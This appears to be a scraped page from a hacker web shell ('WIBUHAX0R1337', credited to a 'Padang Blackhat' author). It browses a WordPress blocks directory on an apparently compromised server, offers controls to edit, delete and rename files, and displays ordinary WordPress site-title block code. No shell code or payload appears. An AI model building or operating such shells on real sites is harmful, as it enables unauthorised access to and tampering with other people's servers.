-
WIBUHAX0R1337
-
/
home
/
cideo
/
www
/
wp-includesVIp
/
blocks
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
archives
--
NONE
audio
--
NONE
avatar
--
NONE
block
--
NONE
button
--
NONE
buttons
--
NONE
calendar
--
NONE
categories
--
NONE
code
--
NONE
column
--
NONE
columns
--
NONE
comment-author-name
--
NONE
comment-content
--
NONE
comment-date
--
NONE
comment-edit-link
--
NONE
comment-reply-link
--
NONE
comment-template
--
NONE
comments
--
NONE
comments-pagination
--
NONE
comments-pagination-next
--
NONE
comments-pagination-numbers
--
NONE
comments-pagination-previous
--
NONE
comments-title
--
NONE
cover
--
NONE
embed
--
NONE
file
--
NONE
freeform
--
NONE
gallery
--
NONE
group
--
NONE
heading
--
NONE
home-link
--
NONE
html
--
NONE
image
--
NONE
latest-comments
--
NONE
latest-posts
--
NONE
legacy-widget
--
NONE
list
--
NONE
list-item
--
NONE
loginout
--
NONE
media-text
--
NONE
missing
--
NONE
more
--
NONE
navigation
--
NONE
navigation-link
--
NONE
navigation-submenu
--
NONE
nextpage
--
NONE
page-list
--
NONE
page-list-item
--
NONE
paragraph
--
NONE
pattern
--
NONE
post-author
--
NONE
post-author-biography
--
NONE
post-author-name
--
NONE
post-comments-form
--
NONE
post-content
--
NONE
post-date
--
NONE
post-excerpt
--
NONE
post-featured-image
--
NONE
post-navigation-link
--
NONE
post-template
--
NONE
post-terms
--
NONE
post-title
--
NONE
preformatted
--
NONE
pullquote
--
NONE
query
--
NONE
query-no-results
--
NONE
query-pagination
--
NONE
query-pagination-next
--
NONE
query-pagination-numbers
--
NONE
query-pagination-previous
--
NONE
query-title
--
NONE
quote
--
NONE
read-more
--
NONE
rss
--
NONE
search
--
NONE
separator
--
NONE
shortcode
--
NONE
site-logo
--
NONE
site-tagline
--
NONE
site-title
--
NONE
social-link
--
NONE
social-links
--
NONE
spacer
--
NONE
table
--
NONE
tag-cloud
--
NONE
template-part
--
NONE
term-description
--
NONE
text-columns
--
NONE
verse
--
NONE
video
--
NONE
widget-group
--
NONE
archives.php
2.887KB
Edit File
Delete File
Rename
avatar.php
5.311KB
Edit File
Delete File
Rename
comments-pagination-numbers.php
1.557KB
Edit File
Delete File
Rename
comments-pagination-previous.php
1.6KB
Edit File
Delete File
Rename
cover.php
2.434KB
Edit File
Delete File
Rename
gallery.php
4.854KB
Edit File
Delete File
Rename
home-link.php
4.74KB
Edit File
Delete File
Rename
index.php
0.761KB
Edit File
Delete File
Rename
latest-comments.php
4.885KB
Edit File
Delete File
Rename
legacy-widget.php
3.811KB
Edit File
Delete File
Rename
page-list.php
13.139KB
Edit File
Delete File
Rename
post-author-biography.php
1.414KB
Edit File
Delete File
Rename
post-author-name.php
1.705KB
Edit File
Delete File
Rename
post-featured-image.php
7.193KB
Edit File
Delete File
Rename
post-title.php
1.812KB
Edit File
Delete File
Rename
query-no-results.php
1.765KB
Edit File
Delete File
Rename
query-pagination-numbers.php
3.726KB
Edit File
Delete File
Rename
query.php
0.297KB
Edit File
Delete File
Rename
read-more.php
1.75KB
Edit File
Delete File
Rename
search.php
19.937KB
Edit File
Delete File
Rename
site-logo.php
5.667KB
Edit File
Delete File
Rename
site-tagline.php
0.971KB
Edit File
Delete File
Rename
site-title.php
1.729KB
Edit File
Delete File
Rename
social-link.php
59.563KB
Edit File
Delete File
Rename
tag-cloud.php
1.37KB
Edit File
Delete File
Rename
template-part.php
9.427KB
Edit File
Delete File
Rename
<?php /** * Server-side rendering of the `core/site-title` block. * * @package WordPress */ /** * Renders the `core/site-title` block on the server. * * @param array $attributes The block attributes. * * @return string The render. */ function render_block_core_site_title( $attributes ) { $site_title = get_bloginfo( 'name' ); if ( ! $site_title ) { return; } $tag_name = 'h1'; $classes = empty( $attributes['textAlign'] ) ? '' : "has-text-align-{$attributes['textAlign']}"; if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) { $classes .= ' has-link-color'; } if ( isset( $attributes['level'] ) ) { $tag_name = 0 === $attributes['level'] ? 'p' : 'h' . (int) $attributes['level']; } if ( $attributes['isLink'] ) { $aria_current = is_home() || ( is_front_page() && 'page' === get_option( 'show_on_front' ) ) ? ' aria-current="page"' : ''; $link_target = ! empty( $attributes['linkTarget'] ) ? $attributes['linkTarget'] : '_self'; $site_title = sprintf( '<a href="%1$s" target="%2$s" rel="home"%3$s>%4$s</a>', esc_url( home_url() ), esc_attr( $link_target ), $aria_current, esc_html( $site_title ) ); } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => trim( $classes ) ) ); return sprintf( '<%1$s %2$s>%3$s</%1$s>', $tag_name, $wrapper_attributes, // already pre-escaped if it is a link. $attributes['isLink'] ? $site_title : esc_html( $site_title ) ); } /** * Registers the `core/site-title` block on the server. */ function register_block_core_site_title() { register_block_type_from_metadata( __DIR__ . '/site-title', array( 'render_callback' => 'render_block_core_site_title', ) ); } add_action( 'init', 'register_block_core_site_title' );
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat